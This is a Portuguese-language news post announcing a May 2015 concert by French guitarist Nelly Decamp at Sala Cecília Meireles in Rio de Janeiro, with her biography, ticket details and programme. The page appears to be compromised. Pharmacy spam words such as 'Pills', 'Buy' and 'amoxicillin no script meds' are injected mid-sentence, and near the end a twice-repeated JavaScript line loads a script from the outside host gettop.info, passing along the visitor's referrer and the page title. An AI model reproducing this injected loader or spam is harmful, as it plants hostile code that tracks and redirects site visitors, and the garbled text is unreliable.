Escrito por em 1 maio 2015 nas áreas Jazz/Blues, Música de câmara, Notícia, Programação, Rio de Janeiro

Violonista francesa Nelly Decamp traz clássicos, jazz e world music a concerto da série Música de Câmara da Sala Cecília Meireles. Cheap

 

No sábado, 9 de maio, às 20 horas, a violonista e compositora francesa Nelly Decamp traz a diversidade de seu violão à série Música de Câmara Pills da Sala Cecília Meireles, no Rio de Janeiro. Instrumento da diversidade cultural por excelência (flamenco, jazz, Purchase world music), o violão permite à intérprete entrar em contato com todos os públicos e propor projetos sobre a relação entre as artes e as culturas. O repertório do concerto traz obras de Isaac Albeniz e de Francisco Tarrega, além de composições da própria Nelly.

Violonista clássica e popular, compositora e integrante do grupo Mana Kela, Nelly recebeu um 1° Prêmio do Conservatório Nacional Superior de Música de Paris, na turma de Alexandre Lagoya, e uma Licença de Musicologia da Sorbonne.

Ela se apresenta em concertos de música de câmara com solistas clássicos (Henri Demarquette, Pierre Lénert, Vincent Lucas, Frédéric Laroque, Cyrille Lacrouts), assim como com orquestra (Capitole de Toulouse, por exemplo), e ainda com músicos de jazzworld music (Christian Escoudé, Claude Barthelemy, Keyvan Chemiran). Em sua discografia constam diversos álbuns, como Cancion, 24 Août e Sur le Zinc Buy .

Foto de Dominique Erhard

 

SERVIÇO:

Pills Nelly Decamp, violão

Order 9 de maio, sábado, às 20 horas

Sala Cecília Meireles amoxicillin no script meds (Largo da Lapa, 47, Centro – Rio de Janeiro. Tels.: 21 2332-9223 e 2332-9224)

 

Ingressos a R$ 40, com meia entrada para estudantes e idosos, à venda na bilheteria da Sala e no site Ingresso.com.

680 lugares

Faixa etária: livre

 

Programa: Order

Nelly Decamp – Trois preludes a l’été

Francisco Tarrega – Capricho árabe, serenata

Isaac Albeniz – Granada, Astúrias, Mallorca, Torre Bermeja

Louis Dort – Première, Sur le Zinc, à Christian Escoudé

Nelly Decamp – 1er mouvement, Rumba, 2 ème mouvement, 3 ème mouvement, Thème de Louis, Cap 180, à Vincent Amigo

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Faça seu comentário